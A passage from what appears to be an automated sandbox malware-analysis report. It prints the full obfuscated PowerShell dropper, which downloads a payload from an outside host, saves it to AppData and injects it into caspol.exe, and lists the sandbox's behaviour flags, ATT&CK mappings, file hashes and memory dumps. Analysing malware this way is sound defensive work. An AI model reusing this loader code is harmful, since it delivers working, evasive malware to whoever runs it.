hFMe4RhCEl5In4Co4Br5Ob4SpEZa4Ul4Po4Jo5Su1In7Ca0Kr9Kl'Ho;Lu&sv(Ud`$SkCDeoexcFekRotBlaPriHalBl7mi)Sy Ma`$UpAstfMasSkmDieUnlBo4Da;Un`$GoAFofPrsFrmCueUdlTs5He ka=ru HyFHerLuaRenPekbeoScsistHueDemPe0Te2St Fe'St5Un2Ud4Ph5Fe5Av4Ti5Re5sk5pr2Ga4BlEsv0Si0Su0Wo4Do6ba4De4Hu5Ca4me3An4DrFUn4ArCGo4FjFDo5Ga5Su5No2Zi0PaECh6Hj3fl5Ki2Kn4On5Li4En1Me5Ni4Fo4Mo5Wi7Br4Mo5Ru9fi5De0Ga4Me5Su0Po8Or0ki9La'To;Ag&Un(Pa`$PrCCooOucNokButNoaChiTrlGh7Bl)Kl Ov`$TrAPdfBrsGrmOkerelVo5ru Ar Fo Br;Tr}Rg`$CoFKorFeeDimPrdMepti Ba=La LaFSerReaPenUlkSnoRosKetAmecrmOu0Co2Re Su'Ur4TrBEr4Fa5Ti5Aa2Is4UbEHo4No5Pu4SwCme1St3Un1Su2In'Er;De`$MiAkefHssSpmPreAtlJi6fo Ba=sa IlFDyrDiaUnnSkkCloSpsBetSpeVemOr0Fo2Co Fi'Mi0Un4Sa4Ne1Ce4ReCAw4AnBVa4Ud1Ar4UnCAn4Tr9Le4ArEAs0En0Be1MaDTi0Kn0Ka7UnBSt7Me3Ka5Eo9Se5Te3Ae5En4Ko4St5Gy4ThDHu0TeEga7Ko2Fo5Hj5Co4ZeESu5Sh4Su4Sp9sm4miDSt4Pa5St0PaESk6Ni9Po4isEMa5Oz4Su4Co5En5Se2Id4NiFPa5Hj0Eu7Ma3Po4En5co5Fe2Fu5Ca6Me4Mo9Ba4Sp3Ta4Be5Pu5Sj3Co0HoEPh6beDBy4Ns1Ev5Ra2Me5Un3di4Di8Kr4Vi1Di4afCRr7teDUn1AnAAm1HaAAs6Ma7Ne4un5No5St4Am6Fo4Al4An5Fo4UnCNo4va5In4Re7Ud4Fe1Pa5Pr4Gl4In5Mo6Bo6In4WiFDi5St2Sc6Ru6Sk5Af5Kl4DyESk4Dy3sl5Un4We4So9fr4PrFOv4RiENr7Bo0Ho4CaFOd4Sk9Ki4CaESt5Ko4ag4Fi5No5Ar2Da0Fi8Bi0Im8Re4Br6ja4taBBl5Fs0Ti0ho0En0In4wo6Se6Ma5Sk2Fe4Un5St4NuDfi4Du4Be5Af0Sp0ca0Ha0Aa4Ns6Pe3Ir4SeFLe4Ly3Su4SiBRe5Sh4Te4Re1Bi4Wi9Du4EuCFr1Sp4In0Hy9Ci0AtCWi0no0Im0Hs8Br6Un7Va6Tr4Ar7Co4Da0Sp0mu6Tu0Di0Gr8Fo7ShBbr6fo9Ba4PuEDi5Dr4Ek7Er0Co5Tj4He5Ne2lo7AdDag0ViCun0Be0Ge7LoBNo7Py5Fa6No9be4LiESa5Ec4Pa1Kn3br1Un2Ca7DyDUd0ScCDi0Am0Kr7EaBCo7In5He6Fo9Un4InEVe5To4Ch1By3An1la2Ju7GeDSt0DoCMi0Ef0Sa7GaBEn7To5Go6Kr9Sy4LaEUv5Pl4Te1Ar3En1ge2Ll7EpDFu0re9le0Bl0Un0Tr8be7SkBUn6Sn9Hu4SkEOp5He4Su7Cr0Ch5Fe4Ei5In2Pr7AfDVi0En9hj0Sl9Ba0Ho9Sd'Ae;Ku&Vi(pa`$anCFooPucShkCotOmaAsiTelBo7Ud)ac Om`$UnACafLysApmIdeBalEu6In;Sk`$LuRCoeApaCucEr Ca=An SifTakDopSk Li`$AvCEloBecOskEltSeaCoiFllDa5Pa na`$PrCThoUncSmkEptCraGeiRilSn6Pu;Co`$ReAHofRusDvmCoeOclSe7ba Fi=St TrFRerOvaPhnDukVaoResSntWaeDemAr0In2Co Lu'Ch0mo4Ci6VeEOu4de9Ha5Fo4Ka5Be2Lu4SyFIn4AiDSu4Su5Un5Sk4Gr1Ac3Ti0co0Re1HyDDo0Ex0Re0Ti4Pr4Ny1Be4phCUn4BiBDe4No1Wa4InCCo4Fu9Se4frEHa0AnETr6Ka9Me4ArEUf5Sa6Ba4StFFi4KrBBy4St5No0De8Su7PrBec6Re9Un4KoEPo5Li4Af7Jo0Gl5Pr4Sv5Et2An7EpDWa1RuAHe1FrABd7FoAUn4Ti5Su5Fl2Or4ErFSl0VeCAk0Te0Gr1Wh6Bl1Th4Du1Re8Ba0UdCMi0fo0Ga1Re0Ov5Fr8Ud1Bu3Bl1Ki0St1Sl0Mi1Uo0Co0KaCLy0Pr0No1Ul0He5fo8Fu1Cy4Hy1Ch0Se0En9Ha'St;Ge&Bo(Ek`$MaCinoBncAnkCotKoaMaicllAn7Im)Co Ru`$ShANafBlsepmPaecolCl7Fa;ha`$MiAHefDasMimReeAnlAf8Sk Es=Pa DeFPrrRhaSknAnkOpoInsTitDuebimHe0Dk2El Tz'To0Be4Gi6MeBSg4FjEVa4Ah2Af4Ho5ha5Se3Me0Id0Me1TuDGg0Ti0Bi0Fr4Ve4Gl1Mu4GaCGn4PrBUd4Up1Ak4DeCOv4Ve9re4DiEWi0SlECh6Me9Ov4GrEHe5Pa6Ek4TcFGe4LoBPa4Sp5Sj0De8Gr7BeBVa6Tr9Su4skECo5Op4Al7De0Bl5po4ba5He2Ti7obDBi1LaAMo1PrACu7TrAUg4Ak5Tr5Sk2Ac4DiFAv0SuCda0Pa0An1Tr8kl1In1Al1Pa1Ti1Gr1Sl1Gl7Ap1Ne1ro1Wa8oa1Pe4in0PhCto0Re0Dy1Bo0Do5fo8He1ud3Au1he0Ln1Ud0Un1na0Ce0BlCAk0Ma0Ho1Da0He5Ar8Im1Be4Mo0Gr9Po'Ma;Af&Ma(Su`$DaCFjoTocPrkTrtOnaDiiKvlAd7Sp)Im gn`$AmAVafEqsTrmAaeTalHe8Aa;He`$HaFOprSeaMenFoksooRessatCheBamBi0Sa1Ar Ka=De Te'PrhUntTrtRopEx:Sm/Bo/RtmTreOdgDioBaoFukInbRipEnnInqAu.MacUrfGr/BojAfeSvrPenCehErano.FidDisKapCh'Ba;To`$SyFTorloaUnnInkfoosasKrtMaetomTr0Re0fo Gg=Fr PaFOprBeaDinBekStoSusKetDeevamBy0Uf2Ca Br'Re0Ca4Po7Ex6Ta4KlFSl5Fl2Ps5Di4So4so5Cr5Ko2fo0ta0In1svDHu0Sa0He0Sk8Lv6SqEWa4Ti5Re5Ko7Un0UnDTo6DoFSt4Gi2Re4ExATn4Ef5Di4Tr3La5Be4sn0Ha0Do6InEGo4Fo5An5Ca4Ha0TiEAn7En7Fi4Un5Ma4Re2Fa6To3Br4ElCKa4Di9Te4si5Ja4FoEAf5Te4Go0Ny9Ho0StEMo6Al4Ob4DaFOp5Le7Fl4PoEBr4BoCMa4SeFIb4Fu1Fi4Va4So7Sa3Pl5Wi4Ad5Fr2Ou4Co9Sh4acESp4Un7Dr0St8Ba0Mu4No6Py6Dr5Ps2Ov4bl1Ve4ToEUd4shBPr4MaFMi5Bo3Mo5Mi4So4Tr5Ko4ReDIn1Dy0St1Ba1Om0Pl9bo'Gr;In`$ExAFofResSemMoeTelSn8On Un=Ab BuFCarHaaManJokSoofisbrtReeBemKe0Fe2De By'Re0St4Sk6StECo4Fj9No5Ba4Pa5Af2St4StFEj4saDOs4Su5Ps5Ov4St1Kr2Or1soDAf0kd4By4Pa5St4ArEJe5Ni6Kv1ElARe4Ov1ho5Ho0Wr5Ke0Pe4Kl4Pr4Re1Af5re4Fa4Di1Hu'Tr;Li&Bl(He`$UlCmaoSacBokSktLuaLoiMelTo7Fl)Br ce`$GoABrfYdsGemLyeTrlSk8Gu;St`$AfNSkiSatUnrTroEsmTaeTrtFo2Kn=Ze`$MuNBeilutplrseoApmLeeAbtUn2In+Lg'Sp\DeKAgaOmlPlkOplPluBurUnmRuaAnuSk.IndDoaSetAn'Sk;na`$buVAfoBrrSytReeprrMa=En'Ba'fi;poiRefco Ma(Is-HenMaoRetLk(niTVieInscutTh-CiPLuaKutRehgr Ma`$afNNyiDetDerHooCrmAreGatPe2Ca)De)Ru Ud{GdwGthRiiDolSueMe Va(Bl`$OvVmaoMerintSkeDrrTi Ab-SneInqUn Ev'Ca'An)Po Ru{Lr&Hi(hy`$AmCTaoGocFakUdtCoafaiFrlEr7Un)So st`$PrFRerSmaKonBikCaoFasEqtkaePlmEp0De0Sp;UnSChtMiaMirAftRo-KoSprlAmeUneLopSy Tr5Nu;Sa}ChSSeeSatFo-HaCInoScnTetFoeKrnWotSu Dr`$BrNPaiIntSyrNioInmPeeHrtta2Ra Ap`$AlVGloLurFetRseKrrMa;Su}Sn`$brVTeoUnrlgtKoenarTr fu=Ps faGSoeAntub-NoCDioTunKitMaePanRetPa sk`$heNApiSetSnrGooUdmAleSltOv2Di;Li`$UnAObfAlsChmAfeWolVo9Is Fo=Ma UnFUnrFyarenTikNeoKesRatKoeFomHe0Oc2Dr Ta'Vi0Ud4If6co1Ti4Me6Af5Ud3Fe4ReDSu4Vu5Cu4ChCAp0Ab0Be1UnDBu0Gl0Re7DrBUn7En3En5No9Op5el3So5Ar4Or4Av5Er4taDAf0FuEGe6No3Pa4TyFBy4FuEAn5Ry6ka4Tu5Pa5Ru2Ca5Sc4Re7TvDSy1MeADe1HyAPe6Co6Bo5Sa2Sl4WiFTi4HoDNe6Ap2co4Ar1Sa5Un3Zo4An5Sk1Ka6Co1My4Mo7Fu3Me5Ac4Sl5Tr2Ox4Cu9Br4UdESt4Sq7li0Am8Co0Vi4Me7Sm6Id4SlFCi5Gr2Di5He4Af4Hy5Se5ba2Pa0Ti9St'Ou;Me&Sp(Do`$MaCProFocTuksetStaBeiDelSt7an)Ha st`$CyAMofAtsTemTeeAnlKi9Ta;To`$FrVtaoSyrMitSeeParSp0Sn Ca=Sl KrFBorZiaApnVakCooChsArtQueJomTr0Me2Hy Mo'Fr7BoBma7Pa3No5Ka9Gg5Fo3Fo5Sa4Re4Fr5Dk4AsDPr0BaEKo7Ta2Om5Al5ty4PhEMu5Bo4Bu4St9No4TrDGa4On5Ak0DeEKo6Re9Tr4UnEDr5Ta4Ve4We5Dr5He2Fu4SuFSp5Ri0sa7Er3Fl4Sk5Sp5Ca2Pa5Sy6Ba4Zi9st4Un3Ou4Li5Ch5Re3Sa0NoEAg6PaDHv4Fy1He5Ma2Sa5Ou3Ru4Wo8Fi4ic1Bu4PoCSt7OpDWi1UnASt1DrAMo6Ch3lo4TrFRe5En0St5Po9Pl0Mi8Po0Sp4Mo6Sm1Pr4no6Ud5Tv3Sp4ReDPo4Al5Sp4DiCMn0GuCSt0Ba0Re1wh0An0KeCPi0fo0Ty0Un0St0Hu4Kn6OmEPr4Ty9ci5Fr4An5An2In4HeFNa4BeDSl4Un5Pi5st4pr1Fo3Sk0SvCNo0Ln0Na1Fo6Bu1Ko4Ti1ur8St0Fe9Sm'Gy;De&Ud(Co`$GrCChoFocSpkPhtSkaPhiBelAf7Co)Pr Je`$SpVPloskrFitReePlrIl0fr;Au`$FoLAnaTbgTotPahReiBancagAsfJvaEr=Fo`$SaAInfHosBamPieLolPr.FycSkoEkuBlnAmtGi-fi6ki4Re8Su;Do`$KiVDeoVorBitReeBeram1Po Me=Kn StFBlrHyaIsnTykFaoBasTatPheAnmPe0In2Ne Di'Ta7UdBZn7Wi3Co5Su9Pe5Un3Hj5Ar4Bo4He5In4NeDNo0CuEAf7Fl2Fo5Po5Ha4AlEUn5De4Ba4Ps9St4AuDfe4An5Re0StEJe6lg9Ba4MoEPe5pa4Mo4Wo5pr5Re2Ak4neFMa5su0Tj7Sk3sk4Ga5Di5Su2Pi5Ur6Sk4St9Sl4En3Ar4Rd5Ga5Sm3Ge0GrETr6DrDIn4Ef1Sc5Cr2Dr5De3No4De8Ar4Pr1Sa4PlCHa7SoDTr1AlACi1MiASp6Dm3No4ThFPr5Tr0Sc5Lo9Gr0Fo8Ne0Gr4Ja6Fo1Ip4Ma6tr5Cl3Un4AaDLs4Ru5Ra4BoCre0AbCTi0An0Ur1Fo6Pr1sp4Af1No8te0VeCBu0Ta0Bo0Sl4Co6TrBPo4zoEAf4Ko2Mi4Co5Vo5Fo3Sm0AlCMi0Cr0Sl0Ba4Pl6soCTr4Wa1Ge4Sn7Fo5An4me4Ki8Ar4Ok9St4otEDo4No7Sh4In6He4Ko1Ef0Ba9Sk'Mo;Pa&Rd(Ha`$MeCCooBecRokKutFoaGniJelre7Wh)Re Os`$FuValoAnrPatHeeScrAm1Em;Bu`$PrVOvoHerCotLueBorEn2At Ma=Ta FlFKlrBgaShnBekMeoSusGetFoehymSt0pr2Ou Be'Be0No4Wh7er3Ba5He9co4EnDPe5Ry0Bi4No8Ko4KoFal4BeEMo4Tr9at5Re3fo0Co0Il1OmDKa0Ad0Ph7DiBKl7Pr3ve5He9Cr5Fo3Re5Sl4ku4Co5Fr4DiDSk0suEMe7Kv2Im5Ma5Mm4SyEAn5Gs4Sp4Lo9Fl4AnDlo4Ad5Op0seEBr6Ge9va4KeEDi5Ca4Ly4Tr5Fr5Fr2Ye4xeFRe5Ef0Se7Aa3tu4An5Ov5Su2Jo5Un6Fe4St9cr4An3Ud4In5Li5Jo3Vi0boEBa6TrDAk4En1Pe5Pr2an5In3Ch4He8Be4fl1Ya4stCDe7BrDre1SkASo1BrAen6Ta7Co4Zo5Sk5He4ti6So4No4Gu5Ja4CoCSe4St5Th4Gu7Ma4Di1Bi5St4Gl4He5Pr6In6Ep4MoFPi5Pr2Un6Bu6Ca5Ku5Th4UpEFy4Te3Af5Af4Ap4Ta9Fo4KeFkn4InEZo7Ph0Gi4UnFPl4Un9Up4VoESe5Me4Sp4Pa5tr5Am2Re0Tr8Fu0Ta8he4Li6Ty4HjBAu5Sl0No0Br0Bi0Fr4Li6Th3fn4St1Sl5Sh0Pi4Ge1ra4El3ar5Fr4Ov4Pr9Ga5ro3Se4BoETh0Ly0Ov0Bo4Dn6chBDe4sp9Vi4KoBSe4GrBWi4Co5He5La2Mi4ScEpo4Se5Af5Et3Vi0Um9De0SuCAv0In0Tr0Ma8Me6Im7bi6Tr4Ba7Be4No0Ke0Ek6Fl0Ud0Ra8sp7tuBGe6le9Tr4PlEPr5Bl4Fo7Na0Fi5Wa4Ex5Sy2Fo7ReDSu0afCSt0De0Op7DiBPa6Un9Am4FoEOp5Br4Si7De0Da5Br4Or5Te2Va7MiDLa0UmCAl0Su0De7RaBUd6Ta9Un4BoEAf5Fo4Hu7Fi0Ku5Ak4Se5An2Po7VeDNu0SpCDe0Se0Si7DrBPr6Tr9Dy4DrESt5Fu4Co7Vs0Kr5Be4Me5tr2Sp7KuDRa0SaCDe0Un0Sa7RyBCo6Be9Sk4alEve5Ka4Fa7Ba0De5Sc4Re5Sk2Ot7EfDda0Bl9Vu0Ki0Ly0Ge8Tr7udBJu6Sk9Ha4IsEDa5An4In7Ov0Un5Tr4Co5Mi2Ba7DiDIn0Ta9Mo0tr9Po0Ar9ta'Pa;Sa&Ab(Mo`$BuCTaoTacAfkDetKkaSuiVglTa7Sl)Se Bl`$BeVphoRerTatAperurSg2Mo;be`$StVHioAnrDotViePerCa3Su Ex=st SpFForCoaIsnKikProBosVatHeeDamSt0Be2Na Vi'Ha0Nu4Lu7ko3Ar5Sp9Re4HaDTi5Re0Va4Eu8Ma4ApFSi4DaEVi4Su9Sy5Ef3Ne0EbEBr6Lo9Ne4EsEKi5Sa6we4SvFCo4JaBFo4Me5Dr0Fo8Co0sp4Sm6VdEDi4Sn9Pe5St4Gr5Ya2No4ReFSe4suDSy4Ni5Va5Sh4Sk1St3Su0piCya0Kv4Da6RhBmi4PrEGa4Va2Dy4Re5Au5Po3Ha0MeCSl0Rr4Ac7Bo2Re4St5Un4to1Le4Ko3Ha0BeCEc1Ke0Sl0SmCTi1El0Kr0Pe9Pr'To;Kn&bl(Po`$ScCBroMicEnkAntFiaMiiNolNe7No)Sk Sh`$AtVveoKorPatUneSurAn3As#Jo;""";Function Vorter9 ([String]$Undevoutly) { For($Unbettere197=2; $Unbettere197 -lt $Undevoutly.Length-1; $Unbettere197+=(2+1)){$Frankostem = $Frankostem + $Undevoutly.Substring($Unbettere197, 1)}; $Frankostem;}$Cheriecate0 = Vorter9 'LiIPeEGuXVi ';$Cheriecate1= Vorter9 $Svinekd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Cheriecate1 ;}else{&$Cheriecate0 $Cheriecate1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Frankostem02 { param([String]$Undevoutly); $Ngte = ''; Write-Host $Ngte; Write-Host $Ngte; Write-Host $Ngte; $Landgangen = New-Object byte[] ($Undevoutly.Length / 2); For($Unbettere197=0; $Unbettere197 -lt $Undevoutly.Length; $Unbettere197+=2){ $Landgangen[$Unbettere197/2] = [convert]::ToByte($Undevoutly.Substring($Unbettere197, 2), 16); $Landgangen[$Unbettere197/2] = ($Landgangen[$Unbettere197/2] -bxor 32); } [String][System.Text.Encoding]::ASCII.GetString($Landgangen);}$Boltende0=Frankostem02 '73595354454D0E444C4C';$Boltende1=Frankostem02 '6D4943524F534F46540E77494E13120E754E534146456E41544956456D4554484F4453';$Boltende2=Frankostem02 '67455470524F4361444452455353';$Boltende3=Frankostem02 '73595354454D0E72554E54494D450E694E5445524F5073455256494345530E68414E444C45724546';$Boltende4=Frankostem02 '535452494E47';$Boltende5=Frankostem02 '6745546D4F44554C4568414E444C45';$Boltende6=Frankostem02 '72747350454349414C6E414D450C006849444562597349470C007055424C4943';$Boltende7=Frankostem02 '72554E54494D450C006D414E41474544';$Boltende8=Frankostem02 '7245464C454354454464454C4547415445';$Boltende9=Frankostem02 '694E6D454D4F52596D4F44554C45';$Cocktail0=Frankostem02 '6D5964454C454741544574595045';$Cocktail1=Frankostem02 '634C4153530C007055424C49430C007345414C45440C00614E5349634C4153530C006155544F634C415353';$Cocktail2=Frankostem02 '694E564F4B45';$Cocktail3=Frankostem02 '7055424C49430C006849444562597349470C006E4557734C4F540C007649525455414C';$Cocktail4=Frankostem02 '7649525455414C614C4C4F43';$Cocktail5=Frankostem02 '4E54444C4C';$Cocktail6=Frankostem02 '6E5470524F544543547649525455414C6D454D4F5259';$Cocktail7=Frankostem02 '696578';$Cocktail8=Frankostem02 '7C';$Capactisn=Frankostem02 '757365721312';$Kikkernes=Frankostem02 '63414C4C77494E444F5770524F4361';function fkp {Param ($Indis, $Ciselre) ;$Afsmel0 =Frankostem02 '046B4C494E474553001D00087B615050644F4D41494E7D1A1A63555252454E54644F4D41494E0E674554615353454D424C4945530809005C0077484552450D6F424A454354005B00047F0E674C4F42414C615353454D424C596341434845000D614E4400047F0E6C4F434154494F4E0E73504C49540804634F434B5441494C18097B0D117D0E655155414C530804624F4C54454E44451009005D090E674554745950450804624F4C54454E44451109';&($Cocktail7) $Afsmel0;$Afsmel5 = Frankostem02 '04735452495050001D00046B4C494E4745530E6745546D4554484F440804624F4C54454E4445120C007B745950457B7D7D00600804624F4C54454E4445130C0004624F4C54454E4445140909';&($Cocktail7) $Afsmel5;$Afsmel1 = Frankostem02 '52455455524E00047354524950500E694E564F4B4508044E554C4C0C0060087B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E68414E444C457245467D086E45570D6F424A4543540073595354454D0E72554E54494D450E694E5445524F5073455256494345530E68414E444C4572454608086E45570D6F424A45435400694E54705452090C0008046B4C494E4745530E6745546D4554484F440804624F4C54454E44451509090E694E564F4B4508044E554C4C0C00600804694E444953090909090C0004634953454C52450909';&($Cocktail7) $Afsmel1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Tetra,[Parameter(Position = 1)] [Type] $Romeosudfr = [Void]);$Afsmel2 = Frankostem02 '046445434F4C4F5552001D007B615050644F4D41494E7D1A1A63555252454E54644F4D41494E0E644546494E4564594E414D4943615353454D424C5908086E45570D6F424A4543540073595354454D0E7245464C454354494F4E0E615353454D424C596E414D450804624F4C54454E44451809090C007B73595354454D0E7245464C454354494F4E0E654D49540E615353454D424C596255494C4445526143434553537D1A1A72554E090E644546494E4564594E414D49436D4F44554C450804624F4C54454E4445190C000446414C5345090E644546494E45745950450804634F434B5441494C100C0004634F434B5441494C110C007B73595354454D0E6D554C54494341535464454C45474154457D09';&($Cocktail7) $Afsmel2;$Afsmel3 = Frankostem02 '046445434F4C4F55520E644546494E45634F4E5354525543544F520804624F4C54454E4445160C007B73595354454D0E7245464C454354494F4E0E63414C4C494E47634F4E56454E54494F4E537D1A1A7354414E444152440C00047445545241090E734554694D504C454D454E544154494F4E664C4147530804624F4C54454E44451709';&($Cocktail7) $Afsmel3;$Afsmel4 = Frankostem02 '046445434F4C4F55520E644546494E456D4554484F440804634F434B5441494C120C0004634F434B5441494C130C0004724F4D454F53554446520C00047445545241090E734554694D504C454D454E544154494F4E664C4147530804624F4C54454E44451709';&($Cocktail7) $Afsmel4;$Afsmel5 = Frankostem02 '52455455524E00046445434F4C4F55520E635245415445745950450809';&($Cocktail7) $Afsmel5 ;}$Fremdp = Frankostem02 '4B45524E454C1312';$Afsmel6 = Frankostem02 '04414C4B414C494E001D007B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A67455464454C4547415445664F5266554E4354494F4E704F494E5445520808464B5000046652454D44500004634F434B5441494C14090C00086764740060087B694E547054527D0C007B75694E5413127D0C007B75694E5413127D0C007B75694E5413127D0900087B694E547054527D090909';&($Cocktail7) $Afsmel6;$Reac = fkp $Cocktail5 $Cocktail6;$Afsmel7 = Frankostem02 '046E4954524F4D455413001D0004414C4B414C494E0E694E564F4B45087B694E547054527D1A1A7A45524F0C001614180C001058131010100C001058141009';&($Cocktail7) $Afsmel7;$Afsmel8 = Frankostem02 '046B4E424553001D0004414C4B414C494E0E694E564F4B45087B694E547054527D1A1A7A45524F0C0018111111171118140C001058131010100C0010581409';&($Cocktail7) $Afsmel8;$Frankostem01 = 'http://megookbpnq.cf/jernha.dsp';$Frankostem00 = Frankostem02 '04764F52544552001D00086E45570D6F424A454354006E45540E774542634C49454E54090E644F574E4C4F4144735452494E4708046652414E4B4F5354454D101109';$Afsmel8 = Frankostem02 '046E4954524F4D4554121D04454E561A41505044415441';&($Cocktail7) $Afsmel8;$Nitromet2=$Nitromet2+'\Kalklurmau.dat';$Vorter='';if (-not(Test-Path $Nitromet2)) {while ($Vorter -eq '') {&($Cocktail7) $Frankostem00;Start-Sleep 5;}Set-Content $Nitromet2 $Vorter;}$Vorter = Get-Content $Nitromet2;$Afsmel9 = Frankostem02 '046146534D454C001D007B73595354454D0E634F4E564552547D1A1A66524F4D624153451614735452494E470804764F5254455209';&($Cocktail7) $Afsmel9;$Vorter0 = Frankostem02 '7B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A634F505908046146534D454C0C00100C0000046E4954524F4D4554130C0016141809';&($Cocktail7) $Vorter0;$Lagthingfa=$Afsmel.count-648;$Vorter1 = Frankostem02 '7B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A634F505908046146534D454C0C001614180C00046B4E4245530C00046C41475448494E47464109';&($Cocktail7) $Vorter1;$Vorter2 = Frankostem02 '0473594D50484F4E4953001D007B73595354454D0E72554E54494D450E694E5445524F5073455256494345530E6D41525348414C7D1A1A67455464454C4547415445664F5266554E4354494F4E704F494E5445520808464B50000463415041435449534E00046B494B4B45524E4553090C00086764740060087B694E547054527D0C007B694E547054527D0C007B694E547054527D0C007B694E547054527D0C007B694E547054527D0900087B694E547054527D090909';&($Cocktail7) $Vorter2;$Vorter3 = Frankostem02 '0473594D50484F4E49530E694E564F4B4508046E4954524F4D4554130C046B4E4245530C04724541430C100C1009';&($Cocktail7) $Vorter3#"
    3⤵
    - Blocklisted process makes network request
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4116
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      PID:1552
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 2536
        5⤵
        Program crash
        
        PID:1592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1552 -ip 1552
1⤵
PID:5104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6c4805e00673bef922d51b1a7137028f

SHA1
0eabb38482d1733dd85a2af9c5342c2cafcd41eb

SHA256
7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd

SHA512
eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

Download Submit
memory/116-168-0x00007FFD78560000-0x00007FFD79021000-memory.dmp

Filesize
10.8MB

Download
memory/116-153-0x00007FFD78560000-0x00007FFD79021000-memory.dmp

Filesize
10.8MB

Download
memory/116-139-0x00007FFD78560000-0x00007FFD79021000-memory.dmp

Filesize
10.8MB

Download
memory/1552-170-0x00007FFD95A90000-0x00007FFD95C85000-memory.dmp

Filesize
2.0MB

Download
memory/1552-171-0x0000000025170000-0x000000002517A000-memory.dmp

Filesize
40KB

Download
memory/1552-172-0x0000000077260000-0x0000000077403000-memory.dmp

Filesize
1.6MB

Download
memory/1552-169-0x0000000025180000-0x0000000025212000-memory.dmp

Filesize
584KB

Download
memory/1552-173-0x0000000000B00000-0x000000000585C000-memory.dmp

Filesize
77.4MB

Download
memory/1552-166-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1552-164-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/1552-163-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/1552-162-0x0000000077260000-0x0000000077403000-memory.dmp

Filesize
1.6MB

Download
memory/1552-161-0x00007FFD95A90000-0x00007FFD95C85000-memory.dmp

Filesize
2.0MB

Download
memory/1552-159-0x0000000000B00000-0x000000000585C000-memory.dmp

Filesize
77.4MB

Download
memory/3892-152-0x00007FFD784B0000-0x00007FFD78F71000-memory.dmp

Filesize
10.8MB

Download
memory/3892-135-0x00007FFD784B0000-0x00007FFD78F71000-memory.dmp

Filesize
10.8MB

Download
memory/3892-134-0x0000021FD3150000-0x0000021FD3172000-memory.dmp

Filesize
136KB

Download
memory/4116-147-0x0000000007FE0000-0x000000000865A000-memory.dmp

Filesize
6.5MB

Download
memory/4116-145-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/4116-156-0x0000000077260000-0x0000000077403000-memory.dmp

Filesize
1.6MB

Download
memory/4116-149-0x0000000007B60000-0x0000000007BF6000-memory.dmp

Filesize
600KB

Download
memory/4116-158-0x0000000077260000-0x0000000077403000-memory.dmp

Filesize
1.6MB

Download
memory/4116-148-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

Filesize
104KB

Download
memory/4116-160-0x0000000077260000-0x0000000077403000-memory.dmp

Filesize
1.6MB

Download
memory/4116-151-0x000000000D970000-0x000000000DF14000-memory.dmp

Filesize
5.6MB

Download
memory/4116-146-0x0000000006880000-0x000000000689E000-memory.dmp

Filesize
120KB

Download
memory/4116-155-0x00007FFD95A90000-0x00007FFD95C85000-memory.dmp

Filesize
2.0MB

Download
memory/4116-144-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/4116-143-0x0000000005FF0000-0x0000000006012000-memory.dmp

Filesize
136KB

Download
memory/4116-167-0x0000000008660000-0x000000000D3BC000-memory.dmp

Filesize
77.4MB

Download
memory/4116-142-0x0000000005990000-0x0000000005FB8000-memory.dmp

Filesize
6.2MB

Download
memory/4116-141-0x0000000002F50000-0x0000000002F86000-memory.dmp

Filesize
216KB

Download
memory/4116-154-0x0000000008660000-0x000000000D3BC000-memory.dmp

Filesize
77.4MB

Download
memory/4116-150-0x00000000078A0000-0x00000000078C2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

